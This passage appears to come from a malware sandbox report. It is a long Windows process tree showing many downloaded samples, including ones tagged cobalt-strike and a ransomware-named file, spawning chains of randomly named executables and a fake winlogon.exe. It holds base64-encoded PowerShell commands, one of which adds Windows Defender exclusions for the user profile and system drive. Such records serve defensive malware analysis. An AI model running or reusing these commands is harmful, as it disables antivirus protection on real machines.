        PID:6368
    - - C:\Users\Admin\Downloads\240919-hjyy1awcnneac97c9f7533f816cbe246116fe64b07_JaffaCakes118.exe
        
        C:\Users\Admin\Downloads\240919-hjyy1awcnneac97c9f7533f816cbe246116fe64b07_JaffaCakes118.exe
        5⤵
        
        PID:5456
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5456 -s 624
        6⤵
        Program crash
        
        PID:1952
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        7⤵
        
        PID:7644
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        7⤵
        
        PID:8148
- - C:\Users\Admin\Downloads\240919-hmepjawdnp1966e5403bdb0c490487f871c43fab0b4c1f0822ea577baeb0030b713f2eb7c3N.exe
    C:\Users\Admin\Downloads\240919-hmepjawdnp1966e5403bdb0c490487f871c43fab0b4c1f0822ea577baeb0030b713f2eb7c3N.exe
    3⤵
    PID:3992
  - - C:\Windows\SysWOW64\Ccpdoqgd.exe
      C:\Windows\system32\Ccpdoqgd.exe
      4⤵
      PID:4524
- - C:\Users\Admin\Downloads\240919-hmhq7awbnb5f843a03f1310225137d1e36f8c154b9e7388ddd6dcf616e454e758e763412fdN.exe
    C:\Users\Admin\Downloads\240919-hmhq7awbnb5f843a03f1310225137d1e36f8c154b9e7388ddd6dcf616e454e758e763412fdN.exe
    3⤵
    PID:4728
  - - C:\Windows\SysWOW64\Hbhijepa.exe
      C:\Windows\system32\Hbhijepa.exe
      4⤵
      PID:3268
    - - C:\Windows\SysWOW64\Hmnmgnoh.exe
        
        C:\Windows\system32\Hmnmgnoh.exe
        5⤵
        
        PID:2920
      - C:\Windows\SysWOW64\Hkbmqb32.exe
        
        C:\Windows\system32\Hkbmqb32.exe
        6⤵
        
        PID:4468
        
        C:\Windows\SysWOW64\Hpabni32.exe
        
        C:\Windows\system32\Hpabni32.exe
        7⤵
        
        PID:2028
        
        C:\Windows\SysWOW64\Ingpmmgm.exe
        
        C:\Windows\system32\Ingpmmgm.exe
        8⤵
        
        PID:2664
        
        C:\Windows\SysWOW64\Idcepgmg.exe
        
        C:\Windows\system32\Idcepgmg.exe
        9⤵
        
        PID:2408
        
        C:\Windows\SysWOW64\Ikpjbq32.exe
        
        C:\Windows\system32\Ikpjbq32.exe
        10⤵
        
        PID:5224
        
        C:\Windows\SysWOW64\Iggjga32.exe
        
        C:\Windows\system32\Iggjga32.exe
        11⤵
        
        PID:5372
        
        C:\Windows\SysWOW64\Igigla32.exe
        
        C:\Windows\system32\Igigla32.exe
        12⤵
        
        PID:5560
        
        C:\Windows\SysWOW64\Jkimho32.exe
        
        C:\Windows\system32\Jkimho32.exe
        13⤵
        
        PID:5860
        
        C:\Windows\SysWOW64\Jjafok32.exe
        
        C:\Windows\system32\Jjafok32.exe
        14⤵
        
        PID:6108
        
        C:\Windows\SysWOW64\Knooej32.exe
        
        C:\Windows\system32\Knooej32.exe
        15⤵
        
        PID:4248
        
        C:\Windows\SysWOW64\Kkjeomld.exe
        
        C:\Windows\system32\Kkjeomld.exe
        16⤵
        
        PID:5508
        
        C:\Windows\SysWOW64\Kqfngd32.exe
        
        C:\Windows\system32\Kqfngd32.exe
        17⤵
        
        PID:5628
        
        C:\Windows\SysWOW64\Lqkgbcff.exe
        
        C:\Windows\system32\Lqkgbcff.exe
        18⤵
        
        PID:6060
        
        C:\Windows\SysWOW64\Lekmnajj.exe
        
        C:\Windows\system32\Lekmnajj.exe
        19⤵
        
        PID:5140
        
        C:\Windows\SysWOW64\Lqbncb32.exe
        
        C:\Windows\system32\Lqbncb32.exe
        20⤵
        
        PID:4984
        
        C:\Windows\SysWOW64\Mmkkmc32.exe
        
        C:\Windows\system32\Mmkkmc32.exe
        21⤵
        
        PID:5240
        
        C:\Windows\SysWOW64\Mnkggfkb.exe
        
        C:\Windows\system32\Mnkggfkb.exe
        22⤵
        
        PID:5596
        
        C:\Windows\SysWOW64\Mkohaj32.exe
        
        C:\Windows\system32\Mkohaj32.exe
        23⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\Mmbanbmg.exe
        
        C:\Windows\system32\Mmbanbmg.exe
        24⤵
        
        PID:5132
        
        C:\Windows\SysWOW64\Nnbnhedj.exe
        
        C:\Windows\system32\Nnbnhedj.exe
        25⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\Ncofplba.exe
        
        C:\Windows\system32\Ncofplba.exe
        26⤵
        
        PID:5248
        
        C:\Windows\SysWOW64\Nenbjo32.exe
        
        C:\Windows\system32\Nenbjo32.exe
        27⤵
        
        PID:5232
        
        C:\Windows\SysWOW64\Njkkbehl.exe
        
        C:\Windows\system32\Njkkbehl.exe
        28⤵
        
        PID:5720
- - C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
    C:\Users\Admin\Downloads\240919-hme1aswdnqad491ca60a1ea8b3330a50026c7076ae7eba19762040caab98218a3d94d6575fN.exe
    3⤵
    PID:4524
  - - C:\Windows\SysWOW64\Hpabni32.exe
      C:\Windows\system32\Hpabni32.exe
      4⤵
      PID:708
    - - C:\Windows\SysWOW64\Icdheded.exe
        
        C:\Windows\system32\Icdheded.exe
        5⤵
        
        PID:4800
      - C:\Windows\SysWOW64\Igbalblk.exe
        
        C:\Windows\system32\Igbalblk.exe
        6⤵
        
        PID:3404
        
        C:\Windows\SysWOW64\Ikpjbq32.exe
        
        C:\Windows\system32\Ikpjbq32.exe
        7⤵
        
        PID:5212
        
        C:\Windows\SysWOW64\Idhnkf32.exe
        
        C:\Windows\system32\Idhnkf32.exe
        8⤵
        
        PID:5340
        
        C:\Windows\SysWOW64\Icnklbmj.exe
        
        C:\Windows\system32\Icnklbmj.exe
        9⤵
        
        PID:5520
        
        C:\Windows\SysWOW64\Jgkdbacp.exe
        
        C:\Windows\system32\Jgkdbacp.exe
        10⤵
        
        PID:5696
        
        C:\Windows\SysWOW64\Jnhidk32.exe
        
        C:\Windows\system32\Jnhidk32.exe
        11⤵
        
        PID:5972
        
        C:\Windows\SysWOW64\Kkpbin32.exe
        
        C:\Windows\system32\Kkpbin32.exe
        12⤵
        
        PID:448
        
        C:\Windows\SysWOW64\Kdmqmc32.exe
        
        C:\Windows\system32\Kdmqmc32.exe
        13⤵
        
        PID:5176
        
        C:\Windows\SysWOW64\Kkjeomld.exe
        
        C:\Windows\system32\Kkjeomld.exe
        14⤵
        
        PID:5136
- - C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
    C:\Users\Admin\Downloads\240919-hmc6pswdnn1c8a1a2f42fd70f262b091743ad8853b9ab7884f21c9c8a5b0145c5e74880ed5N.exe
    3⤵
    PID:2760
  - - C:\Windows\SysWOW64\Hdokdg32.exe
      C:\Windows\system32\Hdokdg32.exe
      4⤵
      PID:3936
    - - C:\Windows\SysWOW64\Hildmn32.exe
        
        C:\Windows\system32\Hildmn32.exe
        5⤵
        
        PID:2900
      - C:\Windows\SysWOW64\Idahjg32.exe
        
        C:\Windows\system32\Idahjg32.exe
        6⤵
        
        PID:4664
        
        C:\Windows\SysWOW64\Injmcmej.exe
        
        C:\Windows\system32\Injmcmej.exe
        7⤵
        
        PID:4320
        
        C:\Windows\SysWOW64\Ijcjmmil.exe
        
        C:\Windows\system32\Ijcjmmil.exe
        8⤵
        
        PID:5260
        
        C:\Windows\SysWOW64\Ilccoh32.exe
        
        C:\Windows\system32\Ilccoh32.exe
        9⤵
        
        PID:5460
        
        C:\Windows\SysWOW64\Jlfpdh32.exe
        
        C:\Windows\system32\Jlfpdh32.exe
        10⤵
        
        PID:5640
        
        C:\Windows\SysWOW64\Jlhljhbg.exe
        
        C:\Windows\system32\Jlhljhbg.exe
        11⤵
        
        PID:5772
        
        C:\Windows\SysWOW64\Jnlbojee.exe
        
        C:\Windows\system32\Jnlbojee.exe
        12⤵
        
        PID:6088
- - C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
    C:\Users\Admin\Downloads\240919-hl24fawbke51046434636ee20141e62e18698b72081872c53a39c2173df905bba4513b8f2fN.exe
    3⤵
    PID:5272
  - - C:\Windows\SysWOW64\Ijegcm32.exe
      C:\Windows\system32\Ijegcm32.exe
      4⤵
      PID:5424
    - - C:\Windows\SysWOW64\Jkgpbp32.exe
        
        C:\Windows\system32\Jkgpbp32.exe
        5⤵
        
        PID:5720
      - C:\Windows\SysWOW64\Jjafok32.exe
        
        C:\Windows\system32\Jjafok32.exe
        6⤵
        
        PID:6112
        
        C:\Windows\SysWOW64\Kcpahpmd.exe
        
        C:\Windows\system32\Kcpahpmd.exe
        7⤵
        
        PID:5244
        
        C:\Windows\SysWOW64\Kkjeomld.exe
        
        C:\Windows\system32\Kkjeomld.exe
        8⤵
        
        PID:5544
        
        C:\Windows\SysWOW64\Kdbjhbbd.exe
        
        C:\Windows\system32\Kdbjhbbd.exe
        9⤵
        
        PID:5704
        
        C:\Windows\SysWOW64\Lqkgbcff.exe
        
        C:\Windows\system32\Lqkgbcff.exe
        10⤵
        
        PID:2776
- - C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hk7brswdjqeaca4be488cd57107299ee54406acbae_JaffaCakes118.exe
    3⤵
    PID:5752
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c C:\Windows\system32\bhjeaka.bat
      4⤵
      PID:6124
- - C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
    C:\Users\Admin\Downloads\240919-hlbw9awarb9508c09d7dfb89931ad49cacba2daf4b3f306303c2815af7f07bc63ffaffb002N.exe
    3⤵
    PID:5904
  - - C:\Windows\SysWOW64\Njpdnedf.exe
      C:\Windows\system32\Njpdnedf.exe
      4⤵
      PID:3916
    - - C:\Windows\SysWOW64\Anmfbl32.exe
        
        C:\Windows\system32\Anmfbl32.exe
        5⤵
        
        PID:4496
      - C:\Windows\SysWOW64\Akepfpcl.exe
        
        C:\Windows\system32\Akepfpcl.exe
        6⤵
        
        PID:2732
        
        C:\Windows\SysWOW64\Dfdpad32.exe
        
        C:\Windows\system32\Dfdpad32.exe
        7⤵
        
        PID:6140
        
        C:\Windows\SysWOW64\Dkceokii.exe
        
        C:\Windows\system32\Dkceokii.exe
        8⤵
        
        PID:2356
        
        C:\Windows\SysWOW64\Dodjjimm.exe
        
        C:\Windows\system32\Dodjjimm.exe
        9⤵
        
        PID:5996
        
        C:\Windows\SysWOW64\Eejeiocj.exe
        
        C:\Windows\system32\Eejeiocj.exe
        10⤵
        
        PID:5396
        
        C:\Windows\SysWOW64\Fpdcag32.exe
        
        C:\Windows\system32\Fpdcag32.exe
        11⤵
        
        PID:5356
        
        C:\Windows\SysWOW64\Gppcmeem.exe
        
        C:\Windows\system32\Gppcmeem.exe
        12⤵
        
        PID:6388
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 6388 -s 408
        13⤵
        Program crash
        
        PID:6676
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        14⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        14⤵
        
        PID:2900
- - C:\Users\Admin\Downloads\240919-hlps4swdlna801a623080eaac37eb5fc872a3ba272f9c02c893e5938f434873872624987e7N.exe
    C:\Users\Admin\Downloads\240919-hlps4swdlna801a623080eaac37eb5fc872a3ba272f9c02c893e5938f434873872624987e7N.exe
    3⤵
    PID:5440
  - - C:\Windows\SysWOW64\Ndflak32.exe
      C:\Windows\system32\Ndflak32.exe
      4⤵
      PID:1896
    - - C:\Windows\SysWOW64\Akepfpcl.exe
        
        C:\Windows\system32\Akepfpcl.exe
        5⤵
        
        PID:5388
      - C:\Windows\SysWOW64\Cdecgbfa.exe
        
        C:\Windows\system32\Cdecgbfa.exe
        6⤵
        
        PID:5456
        
        C:\Windows\SysWOW64\Domdjj32.exe
        
        C:\Windows\system32\Domdjj32.exe
        7⤵
        
        PID:4308
        
        C:\Windows\SysWOW64\Ddligq32.exe
        
        C:\Windows\system32\Ddligq32.exe
        8⤵
        
        PID:5836
        
        C:\Windows\SysWOW64\Dodjjimm.exe
        
        C:\Windows\system32\Dodjjimm.exe
        9⤵
        
        PID:5128
        
        C:\Windows\SysWOW64\Flmqlg32.exe
        
        C:\Windows\system32\Flmqlg32.exe
        10⤵
        
        PID:6160
        
        C:\Windows\SysWOW64\Gojiiafp.exe
        
        C:\Windows\system32\Gojiiafp.exe
        11⤵
        
        PID:6640
        
        C:\Windows\SysWOW64\Iipfmggc.exe
        
        C:\Windows\system32\Iipfmggc.exe
        12⤵
        
        PID:5876
        
        C:\Windows\SysWOW64\Jpaekqhh.exe
        
        C:\Windows\system32\Jpaekqhh.exe
        13⤵
        
        PID:6440
        
        C:\Windows\SysWOW64\Jinboekc.exe
        
        C:\Windows\system32\Jinboekc.exe
        14⤵
        
        PID:6792
        
        C:\Windows\SysWOW64\Knnhjcog.exe
        
        C:\Windows\system32\Knnhjcog.exe
        15⤵
        
        PID:6704
        
        C:\Windows\SysWOW64\Kjjbjd32.exe
        
        C:\Windows\system32\Kjjbjd32.exe
        16⤵
        
        PID:5948
        
        C:\Windows\SysWOW64\Lcdciiec.exe
        
        C:\Windows\system32\Lcdciiec.exe
        17⤵
        
        PID:6428
        
        C:\Windows\SysWOW64\Lomqcjie.exe
        
        C:\Windows\system32\Lomqcjie.exe
        18⤵
        
        PID:6200
        
        C:\Windows\SysWOW64\Lggejg32.exe
        
        C:\Windows\system32\Lggejg32.exe
        19⤵
        
        PID:6652
        
        C:\Windows\SysWOW64\Ljhnlb32.exe
        
        C:\Windows\system32\Ljhnlb32.exe
        20⤵
        
        PID:932
        
        C:\Windows\SysWOW64\Mfchlbfd.exe
        
        C:\Windows\system32\Mfchlbfd.exe
        21⤵
        
        PID:7084
        
        C:\Windows\SysWOW64\Mfeeabda.exe
        
        C:\Windows\system32\Mfeeabda.exe
        22⤵
        
        PID:6424
        
        C:\Windows\SysWOW64\Mcifkf32.exe
        
        C:\Windows\system32\Mcifkf32.exe
        23⤵
        
        PID:5484
        
        C:\Windows\SysWOW64\Npbceggm.exe
        
        C:\Windows\system32\Npbceggm.exe
        24⤵
        
        PID:5380
        
        C:\Windows\SysWOW64\Ncqlkemc.exe
        
        C:\Windows\system32\Ncqlkemc.exe
        25⤵
        
        PID:6812
        
        C:\Windows\SysWOW64\Ncchae32.exe
        
        C:\Windows\system32\Ncchae32.exe
        26⤵
        
        PID:5344
        
        C:\Windows\SysWOW64\Ojajin32.exe
        
        C:\Windows\system32\Ojajin32.exe
        27⤵
        
        PID:5880
        
        C:\Windows\SysWOW64\Oanokhdb.exe
        
        C:\Windows\system32\Oanokhdb.exe
        28⤵
        
        PID:5588
        
        C:\Windows\SysWOW64\Ocohmc32.exe
        
        C:\Windows\system32\Ocohmc32.exe
        29⤵
        
        PID:4544
        
        C:\Windows\SysWOW64\Ppjbmc32.exe
        
        C:\Windows\system32\Ppjbmc32.exe
        30⤵
        
        PID:6984
        
        C:\Windows\SysWOW64\Pplobcpp.exe
        
        C:\Windows\system32\Pplobcpp.exe
        31⤵
        
        PID:632
        
        C:\Windows\SysWOW64\Pmpolgoi.exe
        
        C:\Windows\system32\Pmpolgoi.exe
        32⤵
        
        PID:6064
        
        C:\Windows\SysWOW64\Pnplfj32.exe
        
        C:\Windows\system32\Pnplfj32.exe
        33⤵
        
        PID:1828
        
        C:\Windows\SysWOW64\Qaqegecm.exe
        
        C:\Windows\system32\Qaqegecm.exe
        34⤵
        
        PID:7144
        
        C:\Windows\SysWOW64\Qodeajbg.exe
        
        C:\Windows\system32\Qodeajbg.exe
        35⤵
        
        PID:1644
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1644 -s 416
        36⤵
        Program crash
        
        PID:6136
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        37⤵
        
        PID:4900
        
        C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        37⤵
        
        PID:1460
- - C:\Users\Admin\Downloads\240919-hl48sswbkgPanelExecutorV11.exe
    C:\Users\Admin\Downloads\240919-hl48sswbkgPanelExecutorV11.exe
    3⤵
    PID:6092
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-EncodedCommand "PAAjAGwAcQB3ACMAPgBBAGQAZAAtAFQAeQBwAGUAIAAtAEEAcwBzAGUAbQBiAGwAeQBOAGEAbQBlACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsAPAAjAHQAZQBkACMAPgBbAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwAuAE0AZQBzAHMAYQBnAGUAQgBvAHgAXQA6ADoAUwBoAG8AdwAoACcAVwBvAHIAawBpAG4AZwAgAGoAdQBzAHQAIABjAGwAaQBjAGsAIABvAGsAJwAsACcAJwAsACcATwBLACcALAAnAEUAcgByAG8AcgAnACkAPAAjAGUAcQBoACMAPgA="
      4⤵
      PID:6668
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"-EncodedCommand "PAAjAGQAawBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAeABhACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGwAYgBmACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAagB2ACMAPgA="
      4⤵
      PID:5264
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe"
      4⤵
      PID:6660
    - - C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe"
        5⤵
        
        PID:5952
      - C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\ransomewrar3.exe"
        6⤵
        
        PID:7732
    - - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        
        C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        5⤵
        
        PID:5000
    - - C:\Windows\SysWOW64\Kantuk.exe
        
        C:\Windows\system32\Kantuk.exe
        5⤵
        
        PID:8908
    - - C:\Windows\SysWOW64\4K51K4.exe
        
        C:\Windows\system32\4K51K4.exe
        5⤵
        
        PID:7760
- - C:\Users\Admin\Downloads\240919-hkt2fawapg2024-09-19_1cc558ec67aa955e292376b214a9e213_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hkt2fawapg2024-09-19_1cc558ec67aa955e292376b214a9e213_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:5220
  - - C:\Windows\System\skgoMOr.exe
      C:\Windows\System\skgoMOr.exe
      4⤵
      PID:224
  - - C:\Windows\System\WfaIKsg.exe
      C:\Windows\System\WfaIKsg.exe
      4⤵
      PID:5176
  - - C:\Windows\System\JtlTInP.exe
      C:\Windows\System\JtlTInP.exe
      4⤵
      PID:4432
  - - C:\Windows\System\KugaBEC.exe
      C:\Windows\System\KugaBEC.exe
      4⤵
      PID:5252
  - - C:\Windows\System\xUxqZyK.exe
      C:\Windows\System\xUxqZyK.exe
      4⤵
      PID:5736
  - - C:\Windows\System\bynEEdM.exe
      C:\Windows\System\bynEEdM.exe
      4⤵
      PID:6208
  - - C:\Windows\System\ahnycBU.exe
      C:\Windows\System\ahnycBU.exe
      4⤵
      PID:6228
  - - C:\Windows\System\cipGhXZ.exe
      C:\Windows\System\cipGhXZ.exe
      4⤵
      PID:6248
  - - C:\Windows\System\gCzexSf.exe
      C:\Windows\System\gCzexSf.exe
      4⤵
      PID:6264
  - - C:\Windows\System\vWxJONB.exe
      C:\Windows\System\vWxJONB.exe
      4⤵
      PID:6280
  - - C:\Windows\System\ydbIpGn.exe
      C:\Windows\System\ydbIpGn.exe
      4⤵
      PID:6296
  - - C:\Windows\System\cJHMTUF.exe
      C:\Windows\System\cJHMTUF.exe
      4⤵
      PID:6312
  - - C:\Windows\System\BvlDzQY.exe
      C:\Windows\System\BvlDzQY.exe
      4⤵
      PID:6332
  - - C:\Windows\System\BZsSbjI.exe
      C:\Windows\System\BZsSbjI.exe
      4⤵
      PID:6412
  - - C:\Windows\System\bvCOZqn.exe
      C:\Windows\System\bvCOZqn.exe
      4⤵
      PID:6432
  - - C:\Windows\System\yewZqNr.exe
      C:\Windows\System\yewZqNr.exe
      4⤵
      PID:6460
  - - C:\Windows\System\MhbUiWT.exe
      C:\Windows\System\MhbUiWT.exe
      4⤵
      PID:6492
  - - C:\Windows\System\FujpgHN.exe
      C:\Windows\System\FujpgHN.exe
      4⤵
      PID:6520
  - - C:\Windows\System\fVbDbid.exe
      C:\Windows\System\fVbDbid.exe
      4⤵
      PID:6540
  - - C:\Windows\System\FrYQlUc.exe
      C:\Windows\System\FrYQlUc.exe
      4⤵
      PID:6568
  - - C:\Windows\System\lGzQBcO.exe
      C:\Windows\System\lGzQBcO.exe
      4⤵
      PID:6600
- - C:\Users\Admin\Downloads\240919-hkrw3swcrjfile.exe
    C:\Users\Admin\Downloads\240919-hkrw3swcrjfile.exe
    3⤵
    PID:5732
- - C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
    C:\Users\Admin\Downloads\240919-hk1h8awdjjbc1f7d7dd47d8221676316b4eba81e38a9a80c3981c84f87507e5a54ea736ad7N.exe
    3⤵
    PID:5372
  - - C:\Windows\SysWOW64\Qjiipk32.exe
      C:\Windows\system32\Qjiipk32.exe
      4⤵
      PID:5812
    - - C:\Windows\SysWOW64\Ahmjjoig.exe
        
        C:\Windows\system32\Ahmjjoig.exe
        5⤵
        
        PID:3748
      - C:\Windows\SysWOW64\Aphnnafb.exe
        
        C:\Windows\system32\Aphnnafb.exe
        6⤵
        
        PID:1536
        
        C:\Windows\SysWOW64\Adfgdpmi.exe
        
        C:\Windows\system32\Adfgdpmi.exe
        7⤵
        
        PID:552
        
        C:\Windows\SysWOW64\Ahfmpnql.exe
        
        C:\Windows\system32\Ahfmpnql.exe
        8⤵
        
        PID:6484
        
        C:\Windows\SysWOW64\Bkgeainn.exe
        
        C:\Windows\system32\Bkgeainn.exe
        9⤵
        
        PID:1868
        
        C:\Windows\SysWOW64\Bhkfkmmg.exe
        
        C:\Windows\system32\Bhkfkmmg.exe
        10⤵
        
        PID:6224
- - C:\Users\Admin\Downloads\240919-hjz63awcnpeac97d7e01d0b3b14f85bb97239ecac5_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hjz63awcnpeac97d7e01d0b3b14f85bb97239ecac5_JaffaCakes118.exe
    3⤵
    PID:6620
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\WYHS.exe"
      4⤵
      PID:2976
    - - C:\Users\Admin\AppData\Local\Temp\WYHS.exe
        
        "C:\Users\Admin\AppData\Local\Temp\WYHS.exe"
        5⤵
        
        PID:4664
    - - C:\Windows\SysWOW64\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        
        C:\Windows\system32\~A~m~B~u~R~a~D~u~L~\winlogon.exe
        5⤵
        
        PID:15568
    - - C:\Windows\SysWOW64\Kantuk.exe
        
        C:\Windows\system32\Kantuk.exe
        5⤵
        
        PID:5152
    - - C:\Windows\SysWOW64\4K51K4.exe
        
        C:\Windows\system32\4K51K4.exe
        5⤵
        
        PID:5636
    - - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        C:\Windows\system32\K0L4B0R451.exe
        5⤵
        
        PID:13276
  - - C:\Windows\SysWOW64\4K51K4.exe
      "C:\Windows\system32\4K51K4.exe" "C:\Users\Admin\AppData\Local\Temp\Ð¡·ãpao1011_.exe"
      4⤵
      PID:2208
    - - C:\Users\Admin\AppData\Local\Temp\Ð¡·ãpao1011_.exe
        
        "C:\Users\Admin\AppData\Local\Temp\Ð¡·ãpao1011_.exe"
        5⤵
        
        PID:5048
- - C:\Users\Admin\Downloads\240919-hkf5kswanh2024-09-19_1b150ab288b289beb6e1f41367116282_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hkf5kswanh2024-09-19_1b150ab288b289beb6e1f41367116282_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:6688
- - C:\Users\Admin\Downloads\240919-hj38qawamg2024-09-19_1a5493b328c886fcb700dc374fe0552b_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hj38qawamg2024-09-19_1a5493b328c886fcb700dc374fe0552b_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:4416
- - C:\Users\Admin\Downloads\240919-hjyy1awcnneac97c9f7533f816cbe246116fe64b07_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hjyy1awcnneac97c9f7533f816cbe246116fe64b07_JaffaCakes118.exe
    3⤵
    PID:4368
  - - C:\Windows\SysWOW64\WerFault.exe
      C:\Windows\SysWOW64\WerFault.exe -u -p 4368 -s 640
      4⤵
      Program crash
      PID:5240
    - - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        5⤵
        
        PID:2156
    - - C:\Windows\SysWOW64\K0L4B0R451.exe
        
        "C:\Windows\system32\K0L4B0R451.exe"
        5⤵
        
        PID:6136
- - C:\Users\Admin\Downloads\240919-hjv74swamaeac961fb615a513bc979e5d0b3590e82_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hjv74swamaeac961fb615a513bc979e5d0b3590e82_JaffaCakes118.exe
    3⤵
    PID:5136
- - C:\Users\Admin\Downloads\240919-hj3xyswamfb21f02570a17a71023ba084650ca0b4b3c95f262b8177b56370bba159981a136N.exe
    C:\Users\Admin\Downloads\240919-hj3xyswamfb21f02570a17a71023ba084650ca0b4b3c95f262b8177b56370bba159981a136N.exe
    3⤵
    PID:6652
- - C:\Users\Admin\Downloads\240919-hjqydswcmn2024-09-19_12d68164717ebe302aacbdc4f0755235_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hjqydswcmn2024-09-19_12d68164717ebe302aacbdc4f0755235_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:7568
- - C:\Users\Admin\Downloads\240919-hjsrzswalf1471afff1b1174a97ab756b4fbed1ecd33e883d2c965736dd3b6560a9e8aee6dN.exe
    C:\Users\Admin\Downloads\240919-hjsrzswalf1471afff1b1174a97ab756b4fbed1ecd33e883d2c965736dd3b6560a9e8aee6dN.exe
    3⤵
    PID:8180
- - C:\Users\Admin\Downloads\240919-hh9zwawajdeac90624b777b28d1049dbb907d15a5f_JaffaCakes118.exe
    C:\Users\Admin\Downloads\240919-hh9zwawajdeac90624b777b28d1049dbb907d15a5f_JaffaCakes118.exe
    3⤵
    PID:7896
- - C:\Users\Admin\Downloads\240919-hjb48swclq2024-09-19_124b1788266d35a995f0a06870a95865_cobalt-strike_cobaltstrike_poet-rat.exe
    C:\Users\Admin\Downloads\240919-hjb48swclq2024-09-19_124b1788266d35a995f0a06870a95865_cobalt-strike_cobaltstrike_poet-rat.exe
    3⤵
    PID:8016
- - C:\Users\Admin\Downloads\240919-hjev5awakb37870da7df2f13f1d8c9457b0d2cf4c75982e83edf1de668e651aeedec45b8eeN.exe
    C:\Users\Admin\Downloads\240919-hjev5awakb37870da7df2f13f1d8c9457b0d2cf4c75982e83edf1de668e651aeedec45b8eeN.exe
    3⤵
    PID:1372
  - - C:\Windows\SysWOW64\Icfmci32.exe
      C:\Windows\system32\Icfmci32.exe
      4⤵
      PID:6952
    - - C:\Windows\SysWOW64\Jehfcl32.exe
        
        C:\Windows\system32\Jehfcl32.exe
        5⤵
        
        PID:7392
      - C:\Windows\SysWOW64\Jnedgq32.exe
        
        C:\Windows\system32\Jnedgq32.exe
        6⤵
        
        PID:8040
        
        C:\Windows\SysWOW64\Khdoqefq.exe
        
        C:\Windows\system32\Khdoqefq.exe
        7⤵
        
        PID:6728
        
        C:\Windows\SysWOW64\Kblpcndd.exe
        
        C:\Windows\system32\Kblpcndd.exe
        8⤵
        
        PID:1220
        
        C:\Windows\SysWOW64\Khkdad32.exe
        
        C:\Windows\system32\Khkdad32.exe
        9⤵
        
        PID:2804
        
        C:\Windows\SysWOW64\Llkjmb32.exe
        
        C:\Windows\system32\Llkjmb32.exe
        10⤵
        
        PID:4532
        
        C:\Windows\SysWOW64\Maoifh32.exe
        
